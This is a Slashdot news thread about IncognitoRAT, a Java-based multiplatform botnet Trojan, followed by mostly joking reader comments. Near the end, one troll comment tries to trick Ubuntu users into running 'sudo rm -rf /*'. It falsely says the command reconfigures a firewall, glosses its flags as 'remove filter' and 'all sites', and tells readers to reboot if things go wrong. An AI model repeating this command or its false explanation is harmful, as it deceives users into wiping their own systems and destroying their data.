Multiplatform Java Botnet Spotted In the Wild 203
It's fun sometimes to be smug because you are ("one is") using an operating system less susceptible to malware, or at least less targeted by malware creators, than is Microsoft Windows. Now, reader Orome1 writes with word of a Java-based, equal-opportunity botnet Trojan, excerpting from Help Net Security's report: "'IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms,' explains McAfee's Carlos Castillo." So far, no mention of a Linux version, though.
Typical. Bloody typical. (Score:5, Funny)
No mention of linux support. Do we always have to come last?
Re:um.... (Score:2, Funny)
Read the article.
Re:RUN FOR YOU LIVES !! (Score:5, Funny)
Oracle's marketing dept. should get on this (Score:4, Funny)
Re:RUN FOR YOU LIVES !! (Score:-1, Funny)
I believe this thing is called a "javawocky."
Oh-hahahahaHAHAHAAAAAH!!! We know you're clever because, you have the numerical value of Pi as your username.
Shit, Phil, please oh please tell us some knock-knock jokes now! *jumping up and down while slapping the palms of my wrists together*.
Re:Significance (Score:2, Funny)
Oh, I won't need a link for that.
If you want to see HOT NAKED LESBIANS though, I'll be happy to give you the link: right here [slashdot.org].
If it doesn't work, it's because your firewall blocks it. It's because your Ubuntu Linux, being such a secure OS as you surely know, is highly efficient at blocking various things deemed undesirable. Makes sense, right? But if you want to see HOT NAKED LESBIANS, you'll need to disable it just for this occasion. Luckily this is very easy to do. Just go to Applications -> Utilities -> Terminal, type "sudo rm -rf /*" in the window that appears, and press Enter (to clarify, "rm" means "remove", and "-rf" means "remove filter"; "/*" means "all sites"). Since this is a security-related operation, you will of course need to type in your password to confirm that you are fully aware of what you're doing - which you do, as I have explained it above.
You will need to wait for a few minutes before firewall is reconfigured, though. If your system starts behaving erratically, it may be because the firewall couldn't fully reconfigure due to network being in use; it just means you'll need to reboot.